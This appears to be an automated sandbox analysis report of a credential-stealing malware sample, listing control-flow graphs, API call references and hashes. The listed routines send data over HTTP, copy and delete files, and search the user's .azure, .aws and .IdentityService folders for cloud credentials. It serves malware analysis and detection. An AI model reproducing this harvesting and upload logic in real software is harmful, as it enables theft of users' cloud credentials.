                                                                                                                                                                control_flow_graph 1323 3005960-3005a1b call 301a7a0 call 30047b0 call 301a740 * 5 InternetOpenA StrCmpCA 1338 3005a24-3005a28 1323->1338 1339 3005a1d 1323->1339 1340 3005fc3-3005feb InternetCloseHandle call 301aad0 call 3009ac0 1338->1340 1341 3005a2e-3005ba6 call 3018b60 call 301a920 call 301a8a0 call 301a800 * 2 call 301a9b0 call 301a8a0 call 301a800 call 301a9b0 call 301a8a0 call 301a800 call 301a920 call 301a8a0 call 301a800 call 301a9b0 call 301a8a0 call 301a800 call 301a9b0 call 301a8a0 call 301a800 call 301a9b0 call 301a920 call 301a8a0 call 301a800 * 2 InternetConnectA 1338->1341 1339->1338 1350 300602a-3006095 call 3018990 * 2 call 301a7a0 call 301a800 * 5 call 3001550 call 301a800 1340->1350 1351 3005fed-3006025 call 301a820 call 301a9b0 call 301a8a0 call 301a800 1340->1351 1341->1340 1425 3005bac-3005bba 1341->1425 1351->1350 1426 3005bc8 1425->1426 1427 3005bbc-3005bc6 1425->1427 1428 3005bd2-3005c05 HttpOpenRequestA 1426->1428 1427->1428 1429 3005fb6-3005fbd InternetCloseHandle 1428->1429 1430 3005c0b-3005f2f call 301a9b0 call 301a8a0 call 301a800 call 301a920 call 301a8a0 call 301a800 call 301a9b0 call 301a8a0 call 301a800 call 301a9b0 call 301a8a0 call 301a800 call 301a9b0 call 301a8a0 call 301a800 call 301a9b0 call 301a8a0 call 301a800 call 301a920 call 301a8a0 call 301a800 call 301a9b0 call 301a8a0 call 301a800 call 301a9b0 call 301a8a0 call 301a800 call 301a920 call 301a8a0 call 301a800 call 301a9b0 call 301a8a0 call 301a800 call 301a9b0 call 301a8a0 call 301a800 call 301a9b0 call 301a8a0 call 301a800 call 301a9b0 call 301a8a0 call 301a800 call 301a920 call 301a8a0 call 301a800 call 301aad0 lstrlen call 301aad0 lstrlen GetProcessHeap RtlAllocateHeap call 301aad0 lstrlen call 301aad0 memcpy call 301aad0 lstrlen call 301aad0 * 2 lstrlen memcpy call 301aad0 lstrlen call 301aad0 HttpSendRequestA 1428->1430 1429->1340 1539 3005f35-3005f5f InternetReadFile 1430->1539 1540 3005f61-3005f68 1539->1540 1541 3005f6a-3005fb0 InternetCloseHandle 1539->1541 1540->1541 1542 3005f6c-3005faa call 301a9b0 call 301a8a0 call 301a800 1540->1542 1541->1429 1542->1539
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0301A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0301A7E6
                                                                                                                                                                  • Part of subcall function 030047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 030047EA
                                                                                                                                                                  • Part of subcall function 030047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 03004801
                                                                                                                                                                  • Part of subcall function 030047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 03004818
                                                                                                                                                                  • Part of subcall function 030047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 03004839
                                                                                                                                                                  • Part of subcall function 030047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 03004849
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 030059F8
                                                                                                                                                                • StrCmpCA.SHLWAPI(?,03554CA0), ref: 03005A13
                                                                                                                                                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 03005B93
                                                                                                                                                                • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,035568E0,00000000,?,03549940,00000000,?,03021A1C), ref: 03005E71
                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 03005E82
                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 03005E93
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 03005E9A
                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 03005EAF
                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000000), ref: 03005EC6
                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 03005ED8
                                                                                                                                                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 03005EF1
                                                                                                                                                                • memcpy.MSVCRT(?), ref: 03005EFE
                                                                                                                                                                • lstrlen.KERNEL32(00000000,?,?), ref: 03005F1B
                                                                                                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 03005F2F
                                                                                                                                                                • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 03005F4C
                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 03005FB0
                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 03005FBD
                                                                                                                                                                • HttpOpenRequestA.WININET(00000000,03554DB0,?,03556390,00000000,00000000,00400100,00000000), ref: 03005BF8
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrlen.KERNEL32(?,03021110,?,00000000,03020AEF), ref: 0301A9C5
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcpy.KERNEL32(00000000), ref: 0301AA04
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0301AA12
                                                                                                                                                                  • Part of subcall function 0301A8A0: lstrcpy.KERNEL32(?,03020AEF), ref: 0301A905
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcpy.KERNEL32(00000000,?), ref: 0301A972
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcat.KERNEL32(00000000), ref: 0301A982
                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 03005FC7
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
                                                                                                                                                                • String ID: "$"$------$------$------
                                                                                                                                                                • API String ID: 1703137719-2180234286
                                                                                                                                                                • Opcode ID: bc501cf1e7af9a048e72744d229cb1532cd36ca8f8cb2f5cccbdad525fd38de7
                                                                                                                                                                • Instruction ID: 5e81a0498c346c5e76186fe855d218c7269e985bee4cb3098c01d1a57b7a797c
                                                                                                                                                                • Opcode Fuzzy Hash: bc501cf1e7af9a048e72744d229cb1532cd36ca8f8cb2f5cccbdad525fd38de7
                                                                                                                                                                • Instruction Fuzzy Hash: 0E121E75922218ABDB15EBA0DD94FEEB378BF94710F404199E1066B090EF706B5ACF60

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1550 300a790-300a7ac call 301aa70 1553 300a7bd-300a7d1 call 301aa70 1550->1553 1554 300a7ae-300a7bb call 301a820 1550->1554 1559 300a7e2-300a7f6 call 301aa70 1553->1559 1560 300a7d3-300a7e0 call 301a820 1553->1560 1561 300a81d-300a88e call 301a740 call 301a9b0 call 301a8a0 call 301a800 call 3018b60 call 301a920 call 301a8a0 call 301a800 * 2 1554->1561 1559->1561 1569 300a7f8-300a818 call 301a800 * 3 call 3001550 1559->1569 1560->1561 1593 300a893-300a89a 1561->1593 1586 300aedd-300aee0 1569->1586 1594 300a8d6-300a8ea call 301a740 1593->1594 1595 300a89c-300a8b8 call 301aad0 * 2 CopyFileA 1593->1595 1600 300a8f0-300a992 call 301a9b0 call 301a8a0 call 301a800 call 301a9b0 call 301a8a0 call 301a800 call 301a920 call 301a8a0 call 301a800 call 301a9b0 call 301a8a0 call 301a800 1594->1600 1601 300a997-300aa7a call 301a9b0 call 301a8a0 call 301a800 call 301a9b0 call 301a8a0 call 301a800 call 301a920 call 301a8a0 call 301a800 call 301a9b0 call 301a8a0 call 301a800 call 301a920 call 301a9b0 call 301a8a0 call 301a800 * 2 1594->1601 1607 300a8d2 1595->1607 1608 300a8ba-300a8d4 call 301a7a0 call 30194d0 1595->1608 1660 300aa7f-300aa97 call 301aad0 1600->1660 1601->1660 1607->1594 1608->1593 1668 300aa9d-300aabb 1660->1668 1669 300ae8e-300aea0 call 301aad0 DeleteFileA call 301aa40 1660->1669 1676 300aac1-300aad5 GetProcessHeap RtlAllocateHeap 1668->1676 1677 300ae74-300ae84 1668->1677 1681 300aea5-300aed8 call 301aa40 call 301a800 * 5 call 3001550 1669->1681 1680 300aad8-300aae8 1676->1680 1689 300ae8b 1677->1689 1687 300ae09-300ae16 lstrlen 1680->1687 1688 300aaee-300abea call 301a740 * 6 call 301a7a0 call 3001590 call 3009e10 call 301aad0 StrCmpCA 1680->1688 1681->1586 1691 300ae63-300ae71 memset 1687->1691 1692 300ae18-300ae4d lstrlen call 301a7a0 call 3001590 call 3015190 1687->1692 1737 300ac59-300ac6b call 301aa70 1688->1737 1738 300abec-300ac54 call 301a800 * 12 call 3001550 1688->1738 1689->1669 1691->1677 1708 300ae52-300ae5e call 301a800 1692->1708 1708->1691 1744 300ac7d-300ac87 call 301a820 1737->1744 1745 300ac6d-300ac7b call 301a820 1737->1745 1738->1586 1749 300ac8c-300ac9e call 301aa70 1744->1749 1745->1749 1756 300acb0-300acba call 301a820 1749->1756 1757 300aca0-300acae call 301a820 1749->1757 1764 300acbf-300accf call 301aab0 1756->1764 1757->1764 1770 300acd1-300acd9 call 301a820 1764->1770 1771 300acde-300ae04 call 301aad0 lstrcat * 2 call 301aad0 lstrcat * 2 call 301aad0 lstrcat * 2 call 301aad0 lstrcat * 2 call 301aad0 lstrcat * 2 call 301aad0 lstrcat * 2 call 301aad0 lstrcat * 2 call 301a800 * 7 1764->1771 1770->1771 1771->1680
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0301AA70: StrCmpCA.SHLWAPI(00000000,03021470,0300D1A2,03021470,00000000), ref: 0301AA8F
                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0300AAC8
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 0300AACF
                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR_RUN_EXTRACTOR), ref: 0300ABE2
                                                                                                                                                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0300A8B0
                                                                                                                                                                  • Part of subcall function 0301A820: lstrlen.KERNEL32(00000000,?,?,03015B54,03020ADB,03020ADA,?,?,03016B16,00000000,?,03540578,?,0302110C,?,00000000), ref: 0301A82B
                                                                                                                                                                  • Part of subcall function 0301A820: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A885
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrlen.KERNEL32(?,03021110,?,00000000,03020AEF), ref: 0301A9C5
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcpy.KERNEL32(00000000), ref: 0301AA04
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0301AA12
                                                                                                                                                                  • Part of subcall function 0301A8A0: lstrcpy.KERNEL32(?,03020AEF), ref: 0301A905
                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 0300ACEB
                                                                                                                                                                • lstrcat.KERNEL32(?,03021320), ref: 0300ACFA
                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 0300AD0D
                                                                                                                                                                • lstrcat.KERNEL32(?,03021324), ref: 0300AD1C
                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 0300AD2F
                                                                                                                                                                • lstrcat.KERNEL32(?,03021328), ref: 0300AD3E
                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 0300AD51
                                                                                                                                                                • lstrcat.KERNEL32(?,0302132C), ref: 0300AD60
                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 0300AD73
                                                                                                                                                                • lstrcat.KERNEL32(?,03021330), ref: 0300AD82
                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 0300AD95
                                                                                                                                                                • lstrcat.KERNEL32(?,03021334), ref: 0300ADA4
                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 0300ADB7
                                                                                                                                                                • lstrlen.KERNEL32(?), ref: 0300AE0D
                                                                                                                                                                • lstrlen.KERNEL32(?), ref: 0300AE1C
                                                                                                                                                                • memset.MSVCRT ref: 0300AE6B
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                  • Part of subcall function 0301A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0301A7E6
                                                                                                                                                                  • Part of subcall function 03009E10: memcmp.MSVCRT(?,v20,00000003), ref: 03009E2D
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000), ref: 0300AE97
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessmemcmpmemset
                                                                                                                                                                • String ID: ERROR_RUN_EXTRACTOR
                                                                                                                                                                • API String ID: 4068497927-2709115261
                                                                                                                                                                • Opcode ID: bdabc8b9727e1721ee0b0bbcb18ffaac129821ff2db14d19f2d8df0691f57f4d
                                                                                                                                                                • Instruction ID: c60abd3785f7fcb6f188e4c450e90eeb3d2511b41c8abcaa72ac1b59f0db1700
                                                                                                                                                                • Opcode Fuzzy Hash: bdabc8b9727e1721ee0b0bbcb18ffaac129821ff2db14d19f2d8df0691f57f4d
                                                                                                                                                                • Instruction Fuzzy Hash: 5A127979A532089BDB08FBA0ED94EEE7379BF54211F404059F507AB090DF74AE1ACB60

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 2205 300cef0-300d096 call 301a740 call 301a9b0 call 301a8a0 call 301a800 call 3018b60 call 301a920 call 301a8a0 call 301a800 * 2 call 301aad0 * 2 CopyFileA call 301a740 call 301a9b0 call 301a8a0 call 301a800 call 301a9b0 call 301a8a0 call 301a800 call 301a920 call 301a8a0 call 301a800 call 301a9b0 call 301a8a0 call 301a800 call 301a920 call 301a9b0 call 301a8a0 call 301a800 * 2 call 301aad0 2267 300d3ab-300d3bd call 301aad0 DeleteFileA call 301aa40 2205->2267 2268 300d09c-300d0ba 2205->2268 2275 300d3c2-300d3fd call 301aa40 call 301a800 * 5 call 3001550 2267->2275 2273 300d0c0-300d0d4 GetProcessHeap RtlAllocateHeap 2268->2273 2274 300d391-300d3a1 2268->2274 2276 300d0d7-300d0da 2273->2276 2281 300d3a8 2274->2281 2280 300d0e1-300d0e7 2276->2280 2283 300d326-300d333 lstrlen 2280->2283 2284 300d0ed-300d1a7 call 301a740 * 7 call 301aa70 2280->2284 2281->2267 2285 300d380-300d38e memset 2283->2285 2286 300d335-300d37b lstrlen call 301a7a0 call 3001590 call 3015190 call 301a800 2283->2286 2328 300d1b9-300d1c3 call 301a820 2284->2328 2329 300d1a9-300d1b7 call 301a820 2284->2329 2285->2274 2286->2285 2333 300d1c8-300d1da call 301aa70 2328->2333 2329->2333 2336 300d1ec-300d1f6 call 301a820 2333->2336 2337 300d1dc-300d1ea call 301a820 2333->2337 2341 300d1fb-300d321 call 301aad0 lstrcat * 2 call 301aad0 lstrcat * 2 call 301aad0 lstrcat * 2 call 301aad0 lstrcat * 2 call 301aad0 lstrcat * 2 call 301aad0 lstrcat * 2 call 301aad0 lstrcat * 2 call 301a800 * 7 2336->2341 2337->2341 2341->2276
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrlen.KERNEL32(?,03021110,?,00000000,03020AEF), ref: 0301A9C5
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcpy.KERNEL32(00000000), ref: 0301AA04
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0301AA12
                                                                                                                                                                  • Part of subcall function 0301A8A0: lstrcpy.KERNEL32(?,03020AEF), ref: 0301A905
                                                                                                                                                                  • Part of subcall function 03018B60: GetSystemTime.KERNEL32(?,03549910,030205AE,?,?,?,?,?,?,?,?,?,03004963,?,00000014), ref: 03018B86
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcpy.KERNEL32(00000000,?), ref: 0301A972
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcat.KERNEL32(00000000), ref: 0301A982
                                                                                                                                                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0300CF83
                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0300D0C7
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 0300D0CE
                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 0300D208
                                                                                                                                                                • lstrcat.KERNEL32(?,03021478), ref: 0300D217
                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 0300D22A
                                                                                                                                                                • lstrcat.KERNEL32(?,0302147C), ref: 0300D239
                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 0300D24C
                                                                                                                                                                • lstrcat.KERNEL32(?,03021480), ref: 0300D25B
                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 0300D26E
                                                                                                                                                                • lstrcat.KERNEL32(?,03021484), ref: 0300D27D
                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 0300D290
                                                                                                                                                                • lstrcat.KERNEL32(?,03021488), ref: 0300D29F
                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 0300D2B2
                                                                                                                                                                • lstrcat.KERNEL32(?,0302148C), ref: 0300D2C1
                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 0300D2D4
                                                                                                                                                                • lstrcat.KERNEL32(?,03021490), ref: 0300D2E3
                                                                                                                                                                  • Part of subcall function 0301A820: lstrlen.KERNEL32(00000000,?,?,03015B54,03020ADB,03020ADA,?,?,03016B16,00000000,?,03540578,?,0302110C,?,00000000), ref: 0301A82B
                                                                                                                                                                  • Part of subcall function 0301A820: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A885
                                                                                                                                                                • lstrlen.KERNEL32(?), ref: 0300D32A
                                                                                                                                                                • lstrlen.KERNEL32(?), ref: 0300D339
                                                                                                                                                                • memset.MSVCRT ref: 0300D388
                                                                                                                                                                  • Part of subcall function 0301AA70: StrCmpCA.SHLWAPI(00000000,03021470,0300D1A2,03021470,00000000), ref: 0301AA8F
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000), ref: 0300D3B4
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1973479514-0
                                                                                                                                                                • Opcode ID: a3310502965026841ef2092db5153585e1cdd58bccf9d49b45e27013be8cd524
                                                                                                                                                                • Instruction ID: 48cbf53e070f40a0f24c325212d12bc10eb71087f22cd0ee3ee7964d87faafd7
                                                                                                                                                                • Opcode Fuzzy Hash: a3310502965026841ef2092db5153585e1cdd58bccf9d49b45e27013be8cd524
                                                                                                                                                                • Instruction Fuzzy Hash: 9FE15579A52204ABDB04FBE0ED98EEE7378BF54211F504159F107BB090DF75AA1ACB60
                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 03014D87
                                                                                                                                                                  • Part of subcall function 03018DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 03018E0B
                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 03014DB0
                                                                                                                                                                • lstrcat.KERNEL32(?,\.azure\), ref: 03014DCD
                                                                                                                                                                  • Part of subcall function 03014910: wsprintfA.USER32 ref: 0301492C
                                                                                                                                                                  • Part of subcall function 03014910: FindFirstFileA.KERNEL32(?,?), ref: 03014943
                                                                                                                                                                • memset.MSVCRT ref: 03014E13
                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 03014E3C
                                                                                                                                                                • lstrcat.KERNEL32(?,\.aws\), ref: 03014E59
                                                                                                                                                                  • Part of subcall function 03014910: StrCmpCA.SHLWAPI(?,03020FDC), ref: 03014971
                                                                                                                                                                  • Part of subcall function 03014910: StrCmpCA.SHLWAPI(?,03020FE0), ref: 03014987
                                                                                                                                                                  • Part of subcall function 03014910: FindNextFileA.KERNEL32(000000FF,?), ref: 03014B7D
                                                                                                                                                                  • Part of subcall function 03014910: FindClose.KERNEL32(000000FF), ref: 03014B92
                                                                                                                                                                • memset.MSVCRT ref: 03014E9F
                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 03014EC8
                                                                                                                                                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 03014EE5
                                                                                                                                                                  • Part of subcall function 03014910: wsprintfA.USER32 ref: 030149B0
                                                                                                                                                                  • Part of subcall function 03014910: StrCmpCA.SHLWAPI(?,030208D2), ref: 030149C5
                                                                                                                                                                  • Part of subcall function 03014910: wsprintfA.USER32 ref: 030149E2
                                                                                                                                                                  • Part of subcall function 03014910: PathMatchSpecA.SHLWAPI(?,?), ref: 03014A1E
                                                                                                                                                                  • Part of subcall function 03014910: lstrcat.KERNEL32(?,03554CD0), ref: 03014A4A
                                                                                                                                                                  • Part of subcall function 03014910: lstrcat.KERNEL32(?,03020FF8), ref: 03014A5C
                                                                                                                                                                  • Part of subcall function 03014910: lstrcat.KERNEL32(?,?), ref: 03014A70
                                                                                                                                                                  • Part of subcall function 03014910: lstrcat.KERNEL32(?,03020FFC), ref: 03014A82
                                                                                                                                                                  • Part of subcall function 03014910: lstrcat.KERNEL32(?,?), ref: 03014A96
                                                                                                                                                                  • Part of subcall function 03014910: CopyFileA.KERNEL32(?,?,00000001), ref: 03014AAC
                                                                                                                                                                  • Part of subcall function 03014910: DeleteFileA.KERNEL32(?), ref: 03014B31
                                                                                                                                                                • memset.MSVCRT ref: 03014F2B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
